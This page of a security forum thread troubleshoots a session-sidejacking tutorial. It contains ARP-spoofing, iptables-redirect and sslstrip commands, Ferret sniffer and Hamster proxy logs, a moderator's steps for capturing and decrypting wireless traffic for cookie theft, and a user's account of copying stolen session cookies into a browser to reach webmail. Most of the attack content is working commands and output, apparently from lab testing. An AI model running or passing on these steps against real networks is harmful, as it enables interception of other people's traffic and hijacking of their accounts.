Page 2 of 2 FirstFirst 12
Results 11 to 16 of 16

Thread: [Video] Session Sidejacking (Ferret and Hamster)

  1. #11
    Just burned his ISO virusss's Avatar
    Join Date
    Oct 2007
    Posts
    15

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Works like a charm...


    Just a few things to mention for further reference:

    It works mostly on home networks or very poor configured Business Networks so don't expect to spoof easily any Network ( especially where a Switch layer 3 by Cisco is involved).

    You can also edit cookies sessions in you browser so if it's asking to login and you used sslstrip try to look for valid cookies. In my case sslstrip didn't start but I was able to copy manually some cookies and replace them in my browser ( use an addon for Firefox or Opera which has a cookie editor).
    I tried for https://mail.yahoo.com and it worked just fine....+ some other sites on http.

    Good Luck!
    A clever person solves a problem. A wise person avoids it.

  2. #12
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Quote Originally Posted by kenv202 View Post
    hi sorry for the late reply, i am using persistent live cd BT4 final, i have updated everything recently using the apt-get cmd

    i fixed the LLC error by changing to my alfa card rather then using my internal wireless card..

    here is my log:
    1st window:
    echo 1 > /proc/sys/net/ipv4/ip_forward

    root@bt:~# arpspoof -i wlan1 -t 192.168.1.107 192.168.1.117
    0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34
    0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34

    2nd window:
    root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    root@bt:~# sslstrip -p -k -f

    sslstrip 0.6 by Moxie Marlinspike running...

    3rd window: (this is where it starts going wrong i think)
    -- Sniffing on interface "wlan1"
    SNIFFING: wlan1
    LINKTYPE: 1 Ethernet
    ID-IP=[192.168.1.117], macaddr=[00:c0:ca:37:a8:34]
    ID-MAC=[00:c0:ca:37:a8:34], ip=[192.168.1.117]
    Traffic seen
    ID-IP=[192.168.1.107], macaddr=[00:23:6c:89:04:73]
    ID-MAC=[00:23:6c:89:04:73], ip=[192.168.1.107]
    ID-IP=[192.168.1.1], Device="UPnP", LOCATION="http://192.168.1.1:5000/rootDesc.xml"
    ID-IP=[192.168.1.1], Device="UPnP", SOFTWARE="Tomato UPnP/1.0 MiniUPnPd/1.4"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="upnp:rootdevice"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:InternetGatewayDevice:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANConnectionDevice:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANDevice:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANIPConnection:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANPPPConnection:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:Layer3Forwarding:1"
    ID-IP=[192.168.1.1], macaddr=[00:1c:10:11:bc:17]
    ID-MAC=[00:1c:10:11:bc:17], ip=[192.168.1.1]
    proto="DNS", query="A", ip.src=[192.168.1.117], name="rcv-srv22.inplay.tubemogul.com"
    ID-DNS="rcv-srv22.inplay.tubemogul.com", address=[174.129.26.97]
    ID-IP=[192.168.1.117], User-Agent="Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)"
    proto="HTTP", op="GET", Host="rcv-srv22.inplay.tubemogul.com", URL="/StreamReceiver/services"

    4th window :

    root@bt:~# /pentest/sniffers/hamster/hamster
    --- HAMPSTER 2.0 side-jacking tool ---
    begining thread
    Set browser to use proxy BackTrack Linux
    DEBUG: set_ports_option(1234)
    DEBUG: mg_open_listening_port(1234)
    Proxy: listening on 127.0.0.1:1234
    GET /StreamReceiver/services
    GET /StreamReceiver/services HTTP/1.1
    User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)
    Accept: text/html, image/jpeg, image/png, text/*, image/*, */*
    Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
    Accept-Language: en
    Host: rcv-srv22.inplay.tubemogul.com
    Connection: close
    Referer: http://static.inplay.tubemogul.com/c...erID=B-4SJ-WF8

    recv failed: Connection reset by peer
    recv failed: Connection reset by peer

    i have no idea why it says recv failed: Connection reset by peer...

    basically once i got hamster up n running, i proceed to using my 2nd laptop which uses windows 7, i used firefox to log into my gmail account.. then refreshed conquer on my BT4 machine but didnt see the log for that computer in kronquer..
    (yes both of my computer r connected to the same network)

    hope u can help =)
    Try without SSLStrip?

    Quote Originally Posted by virusss View Post
    Works like a charm...


    Just a few things to mention for further reference:

    It works mostly on home networks or very poor configured Business Networks so don't expect to spoof easily any Network ( especially where a Switch layer 3 by Cisco is involved).

    You can also edit cookies sessions in you browser so if it's asking to login and you used sslstrip try to look for valid cookies. In my case sslstrip didn't start but I was able to copy manually some cookies and replace them in my browser ( use an addon for Firefox or Opera which has a cookie editor).
    I tried for https://mail.yahoo.com and it worked just fine....+ some other sites on http.

    Good Luck!
    Thanks for the tip!
    Have you...g0tmi1k?

  3. #13
    Just burned his ISO
    Join Date
    Aug 2010
    Posts
    5

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Could someone please help me, I have successfully cracked my WPA key using you'r method g0tmi1k thanks alot, so im guessing my monitoring / injection is working.

    I am testing this on xp sp2 with no av or firewall enabled, with BT4 Final.

    I am using wlan0 does monitor mode have to be enabled? also do i need to be connected to the same router as my xp machine?

    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 192.168.1.104 192.168.1.1

    is 192.168.1.104 192.168.1.1 the IP address and default gateway of the xp machine? if so which one is first or doesn't it matter. Also wouldn't I do arpspoof -i wlan0 -t 192.168.1.104 192.168.1.1

    after folllowing this command

    sslstrip -p -k -f

    I do not receive the message "sslstrip 0.6 by Moxie Marlinspike running..."

    please help

  4. #14
    Just burned his ISO
    Join Date
    Aug 2010
    Posts
    4

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Tested this using BTr1 on netbook connected to network via wlan0 - host pc was win7- worked like a charm

  5. #15
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Quote Originally Posted by pen2paper View Post
    Could someone please help me, I have successfully cracked my WPA key using you'r method g0tmi1k thanks alot, so im guessing my monitoring / injection is working.

    I am testing this on xp sp2 with no av or firewall enabled, with BT4 Final.

    I am using wlan0 does monitor mode have to be enabled? also do i need to be connected to the same router as my xp machine?

    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 192.168.1.104 192.168.1.1

    is 192.168.1.104 192.168.1.1 the IP address and default gateway of the xp machine? if so which one is first or doesn't it matter. Also wouldn't I do arpspoof -i wlan0 -t 192.168.1.104 192.168.1.1

    after folllowing this command

    sslstrip -p -k -f

    I do not receive the message "sslstrip 0.6 by Moxie Marlinspike running..."

    please help
    Try this:

    1. Capture the traffic via airodump.
    2. Decrypt via airdecap
    3. Use ferret (with the -r [filename])
    4. Use hamster

    By doing it that way - you don't have to be connect to the access point (because your in monitor mode). Therefore you don't have to worry about what interfaces to use, and doing a ARP attack (using arpspoof)

    That's odd about sslstrip - try:
    Code:
    whereis sslstrip
    sslstrip -h
    The first command - makes sure it is installed.
    The second command - should display "help"

    In reply to your arpspoof question:

    • the -t bit - your selecting your target. You want to put your targets IP address there.
    • The next IP address is the IP address your spoofing (in this case the gateway).
    • arpspoof I believe is only doing it one way. e.g. tricking the target your the gateway, NOT the gateway your the target.
    • and yes if wlan0 is the interface your connect to the network, you need to use that.


    Quote Originally Posted by siviog1 View Post
    Tested this using BTr1 on netbook connected to network via wlan0 - host pc was win7- worked like a charm
    Thanks for feedback. Good to know it still works. (=
    Have you...g0tmi1k?

  6. #16
    Just burned his ISO
    Join Date
    Jul 2010
    Location
    China
    Posts
    2

    Thumbs up 回复: [Video] Session Sidejacking (Ferret and Hamster)

    Thanks your video. I am happy to watch it! Hope more video!

Page 2 of 2 FirstFirst 12

Similar Threads

  1. [Video] De-ICE.net v1.0 (1.110) {Level 1 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 9
    Last Post: 03-06-2011, 11:38 PM
  2. [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
    By g0tmi1k in forum BackTrack Videos
    Replies: 7
    Last Post: 08-20-2010, 10:00 AM
  3. [Video] De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 02-25-2010, 11:08 AM
  4. framework 3 [...] no session
    By icebox19 in forum Beginners Forum
    Replies: 3
    Last Post: 02-08-2010, 02:41 PM
  5. Video Capture Software
    By sprouty in forum Beginners Forum
    Replies: 4
    Last Post: 01-25-2010, 11:16 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •